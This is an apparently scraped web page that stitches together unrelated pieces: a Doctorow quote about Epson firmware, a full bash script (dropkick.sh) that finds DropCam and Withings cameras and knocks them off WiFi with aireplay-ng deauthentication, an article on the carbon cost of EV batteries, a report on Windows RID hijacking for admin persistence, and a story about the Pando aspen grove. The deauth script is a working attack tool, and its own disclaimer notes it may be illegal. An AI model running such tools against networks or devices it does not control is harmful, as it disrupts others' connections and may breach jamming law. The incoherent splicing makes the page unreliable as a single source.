“Inkjet printers are the trailblazers of terrible technology business-models, patient zero in an epidemic of insisting that we all arrange our affairs to benefit corporate shareholders, at our own expense,” Doctorow told me via email.
Doctorow notes that not only is this kind of behavior sleazy, it undermines security by eroding consumer faith in the software update process. Especially given that some printers can be easily compromised and used as an attack vector into the rest of the home network.
“By abusing the updating mechanism, Epson is poisoning the security well for all of us: when Epson teaches people not to update their devices, they put us all at risk from botnets,ransomware epidemics, denial of service, cyber-voyeurism and the million horrors of contemporary internet security,” Doctorow said.
“Infosec may be a dumpster-fire, but that doesn’t mean Epson should pour gasoline on it,” he added.
There have been a few too many stories lately of AirBnB hosts caught spying on their guests with WiFi cameras, using DropCam cameras in particular. Here’s a quick script that will detect two popular brands of WiFi cameras during your stay and disconnect them in turn. It’s based on glasshole.sh. It should do away with the need to rummage around in other people’s stuff, racked with paranoia, looking for the things.
Thanks to Adam Harvey for giving me the push, not to mention for naming it.
For a plug-and-play solution in the form of a network appliance, see Cyborg Unplug.
#!/bin/bash## DROPKICK.SH ## Detect and Disconnect the DropCam and Withings devices some people are using to# spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:## http://julianoliver.com/output/log_2014-05-30_20-52 ## This script was named by Adam Harvey (http://ahprojects.com), who also# encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,# etc) and the aircrack-ng suite. I put 'beep' in there for a little audio# notification. Comment it out if you don't need it.## See also http://plugunplug.net, for a plug-and-play device that does this# based on OpenWrt. Code here:## https://github.com/JulianOliver/CyborgUnplug# # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:## sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>shopt -s nocasematch # Set shell to ignore caseshopt -s extglob # For non-interactive shell.readonly NIC=$1# Your wireless NICreadonly BSSID=$2# Network BSSID (AirBnB WiFi network)readonly MAC=$(/sbin/ifconfig | grep $NIC| head -n 1| awk '{ print $5 }')# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not# present.readonly GGMAC='@(30:8C:FB*|00:24:E4*)'# Match against DropCam and Withings readonly POLL=30# Check every 30 secondsreadonly LOG=/var/log/dropkick.log
airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC# Start a monitor devicewhiletrue;dofor TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \'([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')doif[["$TARGET"=="$GGMAC"]]then# Audio alert
beep -f 1000 -l 500 -n 200 -r 2
echo"WiFi camera discovered: "$TARGET >> $LOG
aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
echo"De-authed: "$TARGET" from network: "$BSSID >> $LOGecho' __ __ _ __ __ ___/ /______ ___ / /__ (_)___/ /_____ ___/ / / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ / \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/ /_/ 'elseecho$TARGET": is not a DropCam or Withings device. Leaving alone.."fidoneecho"None found this round."
sleep $POLLdone
airmon-ng stop mon0
Disclaimer
For the record, I’m well aware DropCam and Withings are also sold as baby monitors and home security products. The very fact this code exists should challenge you to reconsider the non-sane choice to rely on anything wireless for home security. More so, WiFi jammers – while illegal – are cheap. If you care, use cable.
It may be illegal to use this script in the US. Due to changes in FCC regulation in 2015, it appears intentionally de-authing WiFi clients, even in your own home, is now classed as ‘jamming’. Up until recently, jamming was defined as the indiscriminate addition of noise to signal – still the global technical definition. It’s worth noting here that all wireless routers necessarily ship with the ability to de-auth, as part of the 802.11 specification.
All said, use of this script is at your own risk. Use with caution.
Every major carmaker has plans for electric vehicles to cut greenhouse gas emissions, yet their manufacturers are, by and large, making lithium-ion batteries in places with some of the most polluting grids in the world.
By 2021, capacity will exist to build batteries for more than 10 million cars running on 60 kilowatt-hour packs, according to data of Bloomberg NEF. Most supply will come from places like China, Thailand, Germany and Poland that rely on non-renewable sources like coal for electricity.
Not So Green?
Year 1 includes manufacturing-stage emissions. Predictions based on carbon tailpipe emissions and energy mix in 2017.
Source: Berylls Strategy Advisors
“We’re facing a bow wave of additional CO2 emissions,” said Andreas Radics, a managing partner at Munich-based automotive consultancy Berylls Strategy Advisors, which argues that for now, drivers in Germany or Poland may still be better off with an efficient diesel engine.
The findings, among the more bearish ones around, show that while electric cars are emission-free on the road, they still discharge a lot of the carbon-dioxide that conventional cars do.
Just to build each car battery—weighing upwards of 500 kilograms (1,100 pounds) in size for sport-utility vehicles—would emit up to 74 percent more C02 than producing an efficient conventional car if it’s made in a factory powered by fossil fuels in a place like Germany, according to Berylls’ findings.
[…]
Just switching to renewable energy for manufacturing would slash emissions by 65 percent, according to Transport & Environment. In Norway, where hydro-electric energy powers practically the entire grid, the Berylls study showed electric cars generate nearly 60 percent less CO2 over their lifetime, compared with even the most efficient fuel-powered vehicles.
As it is now, manufacturing an electric car pumps out “significantly” more climate-warming gases than a conventional car, which releases only 20 percent of its lifetime C02 at this stage, according to estimates of Mercedes-Benz’s electric-drive system integration department.
A security researcher from Colombia has found a way of assigning admin rights and gaining boot persistence on Windows PCs that’s simple to execute and hard to stop –all the features that hackers and malware authors are looking for from an exploitation technique.
What’s more surprising, is that the technique was first detailed way back in December 2017, but despite its numerous benefits and ease of exploitation, it has not received either media coverage nor has it been seen employed in malware campaigns.
Discovered by Sebastián Castro, a security researcher for CSL, the technique targets one of the parameters of Windows user accounts known as the Relative Identifier (RID).
The RID is a code added at the end of account security identifiers (SIDs) that describes that user’s permissions group. There are several RIDs available, but the most common ones are 501 for the standard guest account, and 500 for admin accounts.
Image: Sebastian Castro
Castro, with help from CSL CEO Pedro García, discovered that by tinkering with registry keys that store information about each Windows account, he could modify the RID associated with a specific account and grant it a different RID, for another account group.
The technique does not allow a hacker to remotely infect a computer unless that computer has been foolishly left exposed on the Internet without a password.
But in cases where a hacker has a foothold on a system –via either malware or by brute-forcing an account with a weak password– the hacker can give admin permissions to a compromised low-level account, and gain a permanent backdoor with full SYSTEM access on a Windows PC.
Since registry keys are also boot persistent, any modifications made to an account’s RID remain permanent, or until fixed.
The attack is also very reliable, being tested and found to be working on Windows versions going from XP to 10 and from Server 2003 to Server 2016, although even older versions should be vulnerable, at least in theory.
“It is not so easy to detect when exploited, because this attack could be deployed by using OS resources without triggering any alert to the victim,” Castro told ZDNet in an interview last week.
“On the other hand, I think is easy to spot when doing forensics operations, but you need to know where to look at.
“It is possible to find out if a computer has been a victim of RID hijacking by looking inside the [Windows] registry and checking for inconsistencies on the SAM [Security Account Manager],” Castro added.
The Pando aspen grove, located in central Utah, is the largest organism on the planet by weight. From the surface, it may look like a forest that spans more than 100 U.S. football fields, but each tree shares the exact same DNA and is connected to its clonal brethren through an elaborate underground root system. Although not quite as large in terms of area as the massive Armillaria gallica fungus in Michigan, Pando is much heavier, weighing in at more than 6 million kilograms. Now, researchers say, the grove is in danger, being slowly eaten away by mule deer and other herbivores—and putting the fate of its ecosystem in jeopardy.
“This is a really unusual habitat type,” says Luke Painter, an ecologist at Oregon State University in Corvallis who was not involved with the research. “A lot of animals depend on it.”
Aspen forests such as the Pando grove and many others reproduce in two ways. The first is the familiar system in which mature trees drop seeds that grow into new trees. But more commonly, aspen and some other tree species reproduce by sending out sprouts from their roots, which grow up through the soil into entire new trees. The exact amount of time it took the Pando grove to reach its modern extent is unknown, says Paul Rogers, an ecologist at Utah State University in Logan. “However, it’s very likely that it’s centuries old, and it’s just as likely that it’s millennia old.”
Scientists first noticed the Pando shrinking in the late ’90s. They suspected elk, cattle, and most prominently deer were eating the new shoots, so in the new study Rogers and colleagues divided the forest into three experimental groups. One section was completely unfenced, allowing animals to forage freely on the baby aspen. A second section was fenced and left alone. And a third section was fenced and then treated in some places with strategies to spur aspen growth, such as shrub removal and controlled burning; in other places it was left untreated.
Aerial photos of the Pando grove spanning 1939 to 2011, which show the grove thinning over time
USDA Aerial Photography Field Office, Salt Lake City, Utah
The good news, at least for Pando, is that it appears that keeping out the deer is enough to solve the problem. But fencing the entirety of the grove is neither practical nor palatable, says Rogers, who partners with the U.S. Forest Service’s Rocky Mountain Research Station in Fort Collins, Colorado, as part of the Western Aspen Alliance, a group committed to improving aspen management and restoring their ecosystems. “Everybody, including myself, doesn’t want fences around this iconic grove. We don’t want to go to nature to see a bunch of fences.”
The alternative, he says, is to do something about the mule deer population. The thinning of the forest has only started to occur in the past century or so. This time frame roughly coincides with when humans entered the area, building cabins, banning hunting, and removing carnivores like wolves that would ordinarily prey on the deer. These human activities, Rogers says, has turned Pando into a safe haven for the deer, artificially inflating their numbers in the area.
With the new data in hand, he’s planning to advocate for a culling of the deer population in the area. Although that may seem extreme, it may be the only chance to give Pando a chance a long-term survival. “The real problem,” Rogers says, “is that there are too many mouths to feed in this area.”